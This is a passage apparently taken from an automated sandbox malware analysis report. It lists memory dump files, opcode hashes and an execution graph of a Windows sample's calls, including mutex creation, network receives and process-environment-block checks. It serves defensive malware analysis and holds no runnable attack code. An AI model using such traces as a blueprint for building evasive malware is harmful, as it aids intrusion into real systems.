                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                        • Instruction ID: 8b537ad7b4d019f4f29b464717b34cd3e18e57202bfa189172e7a86bedaead53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DE08C32921228EBCF14DFD8D90499AF3EDEB49B00B65009AF901D3650C270DF00C7D4

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:0.9%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:586
                                                                                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                                                                                        execution_graph 10184 9c9adc 10187 9c9aea 10184->10187 10185 9ca917 10186 9ca953 Sleep CreateMutexA 10185->10186 10188 9ca98e 10186->10188 10187->10185 10189 9c9b4b 10187->10189 10190 9c9b59 10189->10190 10191 9c5c10 3 API calls 10189->10191 10192 9c9b7c 10191->10192 10193 9c8b30 3 API calls 10192->10193 10194 9c9b8d 10193->10194 10195 9c5c10 3 API calls 10194->10195 10196 9c9cb1 10195->10196 10197 9c8b30 3 API calls 10196->10197 10198 9c9cc2 10197->10198 10305 9c3f9f 10306 9c3fad 10305->10306 10307 9c3fb6 10305->10307 10308 9c2410 4 API calls 10306->10308 10308->10307 10454 9c215a 10457 9dc6fc 10454->10457 10456 9c2164 10458 9dc70c 10457->10458 10459 9dc724 10457->10459 10458->10459 10461 9dcfbe 10458->10461 10459->10456 10462 9dccd5 InitializeCriticalSectionEx 10461->10462 10463 9dcfd0 10462->10463 10463->10458 9743 9ca856 9744 9ca870 9743->9744 9746 9ca892 9743->9746 9745 9ca953 Sleep CreateMutexA 9744->9745 9744->9746 9747 9ca98e 9745->9747 10309 9c2b90 10310 9c2bce 10309->10310 10313 9db7fb 10310->10313 10312 9c2bdb 10314 9db807 10313->10314 10316 9db817 10313->10316 10314->10316 10317 9dca78 10314->10317 10316->10312 10318 9dca8d TpReleaseWork 10317->10318 10318->10316 10418 9dd111 10420 9dd122 10418->10420 10419 9dd12a 10420->10419 10422 9dd199 10420->10422 10423 9dd1a7 SleepConditionVariableCS 10422->10423 10425 9dd1c0 10422->10425 10423->10425 10425->10420 10426 9c2b10 10427 9c2b1c 10426->10427 10428 9c2b1a 10426->10428 10429 9dc26a 4 API calls 10427->10429 10430 9c2b22 10429->10430 9748 9c3c8e 9749 9c3c98 9748->9749 9751 9c3ca5 9749->9751 9756 9c2410 9749->9756 9760 9c3810 9751->9760 9757 9c2424 9756->9757 9764 9db52d 9757->9764 9761 9c381c 9760->9761 9844 9c2440 9761->9844 9772 9f3aed 9764->9772 9767 9db5a5 9779 9db1ad 9767->9779 9768 9db598 9775 9daf56 9768->9775 9771 9c242a 9771->9751 9783 9f4f29 9772->9783 9774 9db555 9774->9767 9774->9768 9774->9771 9776 9daf9f 9775->9776 9778 9dafb2 9776->9778 9820 9db39f 9776->9820 9778->9771 9780 9db1d8 9779->9780 9781 9db1e1 9779->9781 9782 9db39f 4 API calls 9780->9782 9781->9771 9782->9781 9784 9f4f2e 9783->9784 9784->9774 9788 9f8bfc 9784->9788 9789 9fd634 9784->9789 9803 9f65ed 9788->9803 9791 9fd640 9789->9791 9790 9fd69c 9790->9788 9791->9790 9792 9fd81b 9791->9792 9793 9fd726 9791->9793 9795 9fd751 9791->9795 9794 9f65ed 3 API calls 9792->9794 9793->9795 9806 9fd62b 9793->9806 9796 9fd82e 9794->9796 9795->9790 9801 9fd7a5 9795->9801 9809 9fa671 9795->9809 9800 9fd62b 3 API calls 9800->9795 9801->9790 9802 9fa671 3 API calls 9801->9802 9802->9790 9804 9f64c7 3 API calls 9803->9804 9805 9f65fe 9804->9805 9807 9fa671 3 API calls 9806->9807 9808 9fd630 9807->9808 9808->9800 9812 9fa67b 9809->9812 9810 9fa722 9810->9801 9812->9810 9814 9f8bec 9812->9814 9815 9f8bf1 9814->9815 9816 9fd634 3 API calls 9815->9816 9819 9f8bfc 9815->9819 9816->9819 9817 9f65ed 3 API calls 9818 9f8c2f 9817->9818 9819->9817 9831 9dbedf 9820->9831 9823 9db3e8 9823->9778 9840 9dcc31 9831->9840 9834 9f6cbb 9835 9f6cc7 9834->9835 9836 9fa671 3 API calls 9835->9836 9839 9f6ccc 9836->9839 9837 9f8bec 3 API calls 9838 9f6cf6 9837->9838 9839->9837 9841 9dcc3f InitOnceExecuteOnce 9840->9841 9843 9db3e1 9840->9843 9841->9843 9843->9823 9843->9834 9847 9db5d6 9844->9847 9846 9c2472 9848 9db5f1 9847->9848 9849 9f8bec 3 API calls 9848->9849 9851 9db658 9848->9851 9850 9db69f 9849->9850 9851->9846 10474 9c9f44 10475 9c9f4c 10474->10475 10476 9ca953 Sleep CreateMutexA 10475->10476 10477 9ca01f 10475->10477 10478 9ca98e 10476->10478 10199 9dd0c7 10200 9dd0d7 10199->10200 10201 9dd17f 10200->10201 10202 9dd17b RtlWakeAllConditionVariable 10200->10202 10262 9c3c47 10263 9c3c51 10262->10263 10265 9c32d0 5 API calls 10263->10265 10266 9c3c5f 10263->10266 10264 9c3c68 10265->10266 10266->10264 10267 9c3810 3 API calls 10266->10267 10268 9c3cdb 10267->10268 10269 9f6a44 10270 9f6a5c 10269->10270 10271 9f6a52 10269->10271 10274 9f698d 10270->10274 10273 9f6a76 10275 9f690a 3 API calls 10274->10275 10276 9f699f 10275->10276 10276->10273 10203 9c20c0 10204 9dc68b 2 API calls 10203->10204 10205 9c20cc 10204->10205 10206 9ce0c0 recv 10207 9ce122 recv 10206->10207 10208 9ce157 recv 10207->10208 10209 9ce191 10208->10209 10210 9ce2b3 10209->10210 10211 9dc6ac GetSystemTimePreciseAsFileTime 10209->10211 10212 9ce2ee 10211->10212 10213 9dc26a 4 API calls 10212->10213 10214 9ce358 10213->10214 10215 9c2ec0 10216 9c2f06 10215->10216 10219 9c2f6f 10215->10219 10217 9dc6ac GetSystemTimePreciseAsFileTime 10216->10217 10218 9c2f12 10217->10218 10221 9c301e 10218->10221 10225 9c2f1d 10218->10225 10220 9c2fef 10219->10220 10226 9dc6ac GetSystemTimePreciseAsFileTime 10219->10226 10222 9dc26a 4 API calls 10221->10222 10223 9c3024 10222->10223 10224 9dc26a 4 API calls 10223->10224 10227 9c2fb9 10224->10227 10225->10219 10225->10223 10226->10227 10228 9dc26a 4 API calls 10227->10228 10229 9c2fc0 10227->10229 10228->10229 10230 9dc26a 4 API calls 10229->10230 10231 9c2fd8 10229->10231 10230->10231 10231->10220 10232 9dc26a 4 API calls 10231->10232 10233 9c303c 10232->10233 10234 9dc6ac GetSystemTimePreciseAsFileTime 10233->10234 10244 9c3080 10234->10244 10235 9c31c5 10236 9dc26a 4 API calls 10235->10236 10237 9c31cb 10236->10237 10238 9dc26a 4 API calls 10237->10238 10239 9c31d1 10238->10239 10240 9dc26a 4 API calls 10239->10240 10246 9c3193 10240->10246 10241 9c31a7 10242 9dc26a 4 API calls 10243 9c31dd 10242->10243 10244->10235 10244->10237 10244->10241 10245 9dc6ac GetSystemTimePreciseAsFileTime 10244->10245 10247 9c315f 10245->10247 10246->10241 10246->10242 10247->10235 10247->10239 10247->10246 10248 9dbd4c GetSystemTimePreciseAsFileTime 10247->10248 10248->10247 10258 9c2e00 10259 9c2e28 10258->10259 10260 9dc68b 2 API calls 10259->10260 10261 9c2e33 10260->10261 10319 9c8980 10321 9c89d8 10319->10321 10322 9c8aea 10319->10322 10320 9c5c10 3 API calls 10320->10321 10321->10320 10321->10322 10323 9f8bbe 10326 9f8868 10323->10326 10325 9f8bdc 10327 9f887a 10326->10327 10328 9f888f 10327->10328 10329 9f690a 3 API calls 10327->10329 10328->10325 10331 9f88bf 10329->10331 10330 9f6d52 3 API calls 10330->10331 10331->10328 10331->10330 9857 9c9ab8 9859 9c9acc 9857->9859 9860 9c9b08 9859->9860 9861 9ca917 9860->9861 9863 9c9b4b 9860->9863 9862 9ca953 Sleep CreateMutexA 9861->9862 9866 9ca98e 9862->9866 9864 9c9b59 9863->9864 9874 9c5c10 9863->9874 9867 9c9b7c 9892 9c8b30 9867->9892 9869 9c9b8d 9870 9c5c10 3 API calls 9869->9870 9871 9c9cb1 9870->9871 9872 9c8b30 3 API calls 9871->9872 9873 9c9cc2 9872->9873 9875 9c5c54 9874->9875 9902 9c4b30 9875->9902 9877 9c5d17 9877->9867 9878 9c5c7b 9878->9877 9879 9c5c10 3 API calls 9878->9879 9880 9c66ac 9879->9880 9881 9c5c10 3 API calls 9880->9881 9882 9c66b1 9881->9882 9906 9c22c0 9882->9906 9884 9c66c9 9885 9c5c10 3 API calls 9884->9885 9886 9c673d 9885->9886 9887 9c22c0 3 API calls 9886->9887 9889 9c6757 9887->9889 9888 9c5c10 3 API calls 9888->9889 9889->9888 9890 9c22c0 3 API calls 9889->9890 9891 9c6852 9889->9891 9890->9889 9891->9867 9893 9c8b7c 9892->9893 9894 9c5c10 3 API calls 9893->9894 9896 9c8b97 9894->9896 9895 9c8d01 9895->9869 9896->9895 9897 9c5c10 3 API calls 9896->9897 9898 9c8d9a 9897->9898 9899 9c8e7e 9898->9899 9900 9c5c10 3 API calls 9898->9900 9899->9869 9901 9c8f1a 9900->9901 9901->9869 9904 9c4ce5 9902->9904 9905 9c4b92 9902->9905 9904->9878 9905->9904 9909 9f6da6 9905->9909 9987 9c2280 9906->9987 9910 9f6db4 9909->9910 9913 9f6dc2 9909->9913 9914 9f6d19 9910->9914 9913->9905 9919 9f690a 9914->9919 9918 9f6d3d 9918->9905 9920 9f692a 9919->9920 9921 9f6921 9919->9921 9920->9921 9922 9fa671 3 API calls 9920->9922 9927 9f6d52 9921->9927 9923 9f694a 9922->9923 9933 9fb5fb 9923->9933 9928 9f6d8f 9927->9928 9929 9f6d5f 9927->9929 9979 9fb67d 9928->9979 9932 9f6d6e 9929->9932 9974 9fb6a1 9929->9974 9932->9918 9934 9fb60e 9933->9934 9935 9f6960 9933->9935 9934->9935 9941 9ff5ab 9934->9941 9937 9fb628 9935->9937 9938 9fb63b 9937->9938 9939 9fb650 9937->9939 9938->9939 9948 9fe6b1 9938->9948 9939->9921 9942 9ff5b7 9941->9942 9943 9fa671 3 API calls 9942->9943 9944 9ff5c0 9943->9944 9945 9ff606 9944->9945 9946 9f8bec 3 API calls 9944->9946 9945->9935 9947 9ff62b 9946->9947 9949 9fa671 3 API calls 9948->9949 9950 9fe6bb 9949->9950 9953 9fe5c9 9950->9953 9952 9fe6c1 9952->9939 9954 9fe5d5 9953->9954 9955 9f8bec 3 API calls 9954->9955 9956 9fe5f6 9954->9956 9957 9fe668 9955->9957 9956->9952 9958 9fe6a4 9957->9958 9962 9fa72e 9957->9962 9958->9952 9963 9fa739 9962->9963 9964 9f8bec GetPEB ExitProcess GetPEB 9963->9964 9966 9fa7be 9963->9966 9965 9fa7c7 9964->9965 9967 9fe4b0 9966->9967 9968 9fe5c9 GetPEB ExitProcess GetPEB 9967->9968 9969 9fe4c3 9968->9969 9970 9fe259 GetPEB ExitProcess GetPEB 9969->9970 9971 9fe4cb 9970->9971 9972 9fe6c4 GetPEB ExitProcess GetPEB 9971->9972 9973 9fe4dc 9971->9973 9972->9973 9973->9958 9975 9f690a 3 API calls 9974->9975 9976 9fb6be 9975->9976 9978 9fb6ce 9976->9978 9984 9ff1bf 9976->9984 9978->9932 9980 9fa671 3 API calls 9979->9980 9981 9fb688 9980->9981 9982 9fb5fb 3 API calls 9981->9982 9983 9fb698 9982->9983 9983->9932 9985 9f690a 3 API calls 9984->9985 9986 9ff1df 9985->9986 9986->9978 9988 9c2296 9987->9988 9991 9f87f8 9988->9991 9994 9f7609 9991->9994 9993 9c22a4 9993->9884 9995 9f7649 9994->9995 9999 9f7631 9994->9999 9996 9f690a 3 API calls 9995->9996 9995->9999 9997 9f7661 9996->9997 10000 9f7bc4 9997->10000 9999->9993 10002 9f7bd5 10000->10002 10001 9f7be4 10001->9999 10002->10001 10007 9f8168 10002->10007 10012 9f7dc2 10002->10012 10017 9f7de8 10002->10017 10027 9f7f36 10002->10027 10008 9f8178 10007->10008 10009 9f8171 10007->10009 10008->10002 10036 9f7b50 10009->10036 10011 9f8177 10011->10002 10013 9f7dcb 10012->10013 10014 9f7dd2 10012->10014 10015 9f7b50 3 API calls 10013->10015 10014->10002 10016 9f7dd1 10015->10016 10016->10002 10018 9f7e09 10017->10018 10020 9f7def 10017->10020 10018->10002 10019 9f7f69 10025 9f7f77 10019->10025 10026 9f7f8b 10019->10026 10048 9f8241 10019->10048 10020->10018 10020->10019 10021 9f7fa2 10020->10021 10020->10025 10021->10026 10044 9f8390 10021->10044 10025->10026 10052 9f86ea 10025->10052 10026->10002 10028 9f7f4f 10027->10028 10029 9f7f69 10027->10029 10028->10029 10030 9f7fa2 10028->10030 10035 9f7f77 10028->10035 10031 9f7f8b 10029->10031 10032 9f8241 3 API calls 10029->10032 10029->10035 10030->10031 10033 9f8390 3 API calls 10030->10033 10031->10002 10032->10035 10033->10035 10034 9f86ea 3 API calls 10034->10031 10035->10031 10035->10034 10038 9f7b62 10036->10038 10040 9f8ab6 10038->10040 10039 9f7b85 10039->10011 10041 9f8ad1 10040->10041 10042 9f8868 GetPEB ExitProcess GetPEB 10041->10042 10043 9f8adb 10042->10043 10043->10039 10045 9f83ab 10044->10045 10046 9f83dd 10045->10046 10056 9fc88e 10045->10056 10046->10025 10049 9f825a 10048->10049 10059 9fd3c8 10049->10059 10051 9f830d 10051->10025 10051->10051 10054 9f875d 10052->10054 10055 9f8707 10052->10055 10053 9fc88e 3 API calls 10053->10055 10054->10026 10055->10053 10055->10054 10057 9fc733 GetPEB ExitProcess GetPEB 10056->10057 10058 9fc8a6 10057->10058 10058->10046 10060 9fd3d8 10059->10060 10061 9fd3ee 10059->10061 10060->10051 10061->10060 10062 9fd485 10061->10062 10063 9fd48a 10061->10063 10065 9fd4ae 10062->10065 10066 9fd4e4 10062->10066 10064 9fcbdf GetPEB ExitProcess GetPEB 10063->10064 10064->10060 10067 9fd4cc 10065->10067 10068 9fd4b3 10065->10068 10069 9fcef8 GetPEB ExitProcess GetPEB 10066->10069 10071 9fd0e2 GetPEB ExitProcess GetPEB 10067->10071 10070 9fd23e GetPEB ExitProcess GetPEB 10068->10070 10069->10060 10070->10060 10071->10060 10282 9ccc79 10283 9ccc84 10282->10283 10284 9cccda 10283->10284 10285 9c5c10 3 API calls 10283->10285 10286 9cce9d 10285->10286 10288 9cca70 10286->10288 10289 9ccadd 10288->10289 10291 9c5c10 3 API calls 10289->10291 10295 9ccc87 10289->10295 10290 9cccda 10292 9cccf9 10291->10292 10298 9c9030 10292->10298 10294 9c5c10 3 API calls 10296 9cce9d 10294->10296 10295->10290 10295->10294 10297 9cca70 3 API calls 10296->10297 10299 9c907f 10298->10299 10300 9c5c10 3 API calls 10299->10300 10301 9c909a 10300->10301 10301->10295 10302 9c4276 10303 9c2410 4 API calls 10302->10303 10304 9c427f 10303->10304 10072 9c42b0 10075 9c3ac0 10072->10075 10074 9c42bb 10076 9c3af9 10075->10076 10079 9c3c38 10076->10079 10081 9c3b39 10076->10081 10085 9c32d0 10076->10085 10078 9c32d0 5 API calls 10082 9c3c5f 10078->10082 10079->10078 10079->10082 10080 9c3c68 10080->10074 10081->10074 10082->10080 10083 9c3810 3 API calls 10082->10083 10084 9c3cdb 10083->10084 10084->10074 10104 9dc6ac 10085->10104 10087 9c336b 10110 9dc26a 10087->10110 10090 9c333c 10091 9dc26a 4 API calls 10090->10091 10093 9c3350 10090->10093 10094 9c3377 10091->10094 10092 9c3314 10092->10087 10092->10090 10107 9dbd4c 10092->10107 10093->10079 10095 9dc6ac GetSystemTimePreciseAsFileTime 10094->10095 10096 9c33af 10095->10096 10097 9dc26a 4 API calls 10096->10097 10098 9c33b6 10096->10098 10097->10098 10099 9dc26a 4 API calls 10098->10099 10101 9c33d7 10098->10101 10099->10101 10100 9dc26a 4 API calls 10103 9c340e 10100->10103 10101->10100 10102 9c33eb 10101->10102 10102->10079 10103->10079 10114 9dc452 10104->10114 10106 9dc6b9 10106->10092 10131 9dbb72 10107->10131 10109 9dbd5c 10109->10092 10111 9dc274 10110->10111 10112 9dc292 10110->10112 10111->10112 10137 9dc297 10111->10137 10112->10112 10115 9dc4a8 10114->10115 10117 9dc47a 10114->10117 10115->10117 10120 9dcf6b 10115->10120 10117->10106 10118 9dc4fd 10118->10117 10119 9dcf6b GetSystemTimePreciseAsFileTime 10118->10119 10119->10118 10121 9dcf7a 10120->10121 10123 9dcf87 10120->10123 10121->10123 10124 9dcf44 10121->10124 10123->10118 10127 9dcbea 10124->10127 10128 9dcbfb GetSystemTimePreciseAsFileTime 10127->10128 10130 9dcc07 10127->10130 10128->10130 10130->10123 10132 9dbb9c 10131->10132 10133 9dbba4 10132->10133 10134 9dcf6b GetSystemTimePreciseAsFileTime 10132->10134 10133->10109 10135 9dbbcf 10134->10135 10135->10133 10136 9dcf6b GetSystemTimePreciseAsFileTime 10135->10136 10136->10133 10140 9c2ae0 10137->10140 10139 9dc2ae 10141 9dbedf InitOnceExecuteOnce 10140->10141 10142 9c2af4 10141->10142 10142->10139 10143 9fa671 3 API calls 10142->10143 10146 9f6ccc 10143->10146 10144 9f8bec 3 API calls 10145 9f6cf6 10144->10145 10146->10144 10343 9c55f0 10344 9c5610 10343->10344 10345 9c22c0 3 API calls 10344->10345 10346 9c5710 10344->10346 10345->10344 10347 9c43f0 10348 9dbedf InitOnceExecuteOnce 10347->10348 10349 9c440a 10348->10349 10350 9c4411 10349->10350 10351 9f6cbb 3 API calls 10349->10351 10352 9c4424 10351->10352 10495 9c3970 10496 9dc68b 2 API calls 10495->10496 10497 9c39a7 10496->10497 10498 9dc68b 2 API calls 10497->10498 10499 9c39e6 10498->10499 10500 9c2170 10501 9dc6fc InitializeCriticalSectionEx 10500->10501 10502 9c217a 10501->10502 10147 9c5cad 10149 9c5caf 10147->10149 10148 9c5d17 10149->10148 10150 9c5c10 3 API calls 10149->10150 10151 9c66ac 10150->10151 10152 9c5c10 3 API calls 10151->10152 10153 9c66b1 10152->10153 10154 9c22c0 3 API calls 10153->10154 10155 9c66c9 10154->10155 10156 9c5c10 3 API calls 10155->10156 10157 9c673d 10156->10157 10158 9c22c0 3 API calls 10157->10158 10160 9c6757 10158->10160 10159 9c5c10 3 API calls 10159->10160 10160->10159 10161 9c22c0 3 API calls 10160->10161 10162 9c6852 10160->10162 10161->10160 9727 9f6629 9730 9f64c7 9727->9730 9731 9f64d5 9730->9731 9732 9f6520 9731->9732 9735 9f652b 9731->9735 9734 9f652a 9741 9fa302 GetPEB 9735->9741 9737 9f6535 9738 9f653a GetPEB 9737->9738 9739 9f654a 9737->9739 9738->9739 9740 9f6562 ExitProcess 9739->9740 9742 9fa31c 9741->9742 9742->9737 10337 9c9ba5 10338 9c9ba7 10337->10338 10339 9c5c10 3 API calls 10338->10339 10340 9c9cb1 10339->10340 10341 9c8b30 3 API calls 10340->10341 10342 9c9cc2 10341->10342 10163 9c20a0 10166 9dc68b 10163->10166 10165 9c20ac 10169 9dc3d5 10166->10169 10168 9dc69b 10168->10165 10170 9dc3eb 10169->10170 10171 9dc3e1 10169->10171 10170->10168 10172 9dc3be 10171->10172 10173 9dc39e 10171->10173 10182 9dcd0a 10172->10182 10173->10170 10178 9dccd5 10173->10178 10176 9dc3d0 10176->10168 10179 9dc3b7 10178->10179 10180 9dcce3 InitializeCriticalSectionEx 10178->10180 10179->10168 10180->10179 10183 9dcd1f RtlInitializeConditionVariable 10182->10183 10183->10176 10353 9c3fe0 10354 9c4022 10353->10354 10355 9c408c 10354->10355 10356 9c40d2 10354->10356 10359 9c4035 10354->10359 10360 9c35e0 10355->10360 10366 9c3ee0 10356->10366 10361 9c3616 10360->10361 10364 9c364e 10361->10364 10372 9c2ce0 10361->10372 10363 9c369e 10363->10364 10381 9c2c00 10363->10381 10364->10359 10367 9c3f48 10366->10367 10371 9c3f1e 10366->10371 10368 9c3f58 10367->10368 10369 9c2c00 3 API calls 10367->10369 10368->10359 10370 9c3f7f 10369->10370 10370->10359 10371->10359 10373 9c2d1d 10372->10373 10374 9dbedf InitOnceExecuteOnce 10373->10374 10375 9c2d46 10374->10375 10376 9c2d51 10375->10376 10377 9c2d88 10375->10377 10388 9dbef7 10375->10388 10376->10363 10379 9c2440 3 API calls 10377->10379 10380 9c2d9b 10379->10380 10380->10363 10382 9c2c0e 10381->10382 10401 9db847 10382->10401 10384 9c2c42 10385 9c2c49 10384->10385 10407 9c2c80 10384->10407 10385->10364 10387 9c2c58 10389 9dbf03 10388->10389 10390 9dbf6a 10389->10390 10391 9dbf73 10389->10391 10395 9dbe7f 10390->10395 10393 9c2ae0 4 API calls 10391->10393 10394 9dbf6f 10393->10394 10394->10377 10396 9dcc31 InitOnceExecuteOnce 10395->10396 10397 9dbe97 10396->10397 10398 9dbe9e 10397->10398 10399 9f6cbb 3 API calls 10397->10399 10398->10394 10400 9dbea7 10399->10400 10400->10394 10402 9db854 10401->10402 10406 9db873 10401->10406 10410 9dcb77 10402->10410 10404 9db864 10404->10406 10412 9db81e 10404->10412 10406->10384 10408 9db7fb TpReleaseWork 10407->10408 10409 9c2cb2 10408->10409 10409->10387 10411 9dcb92 CreateThreadpoolWork 10410->10411 10411->10404 10413 9db827 10412->10413 10416 9dcdcc 10413->10416 10415 9db841 10415->10406 10417 9dcde1 TpPostWork 10416->10417 10417->10415 10450 9c4120 10451 9c416a 10450->10451 10452 9c3ee0 3 API calls 10451->10452 10453 9c41b2 10451->10453 10452->10453

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 351 9f652b-9f6538 call 9fa302 354 9f655a-9f656c call 9f656d ExitProcess 351->354 355 9f653a-9f6548 GetPEB 351->355 355->354 356 9f654a-9f6559 355->356 356->354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,009F652A,?,?,?,?,?,009F7661), ref: 009F6566
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
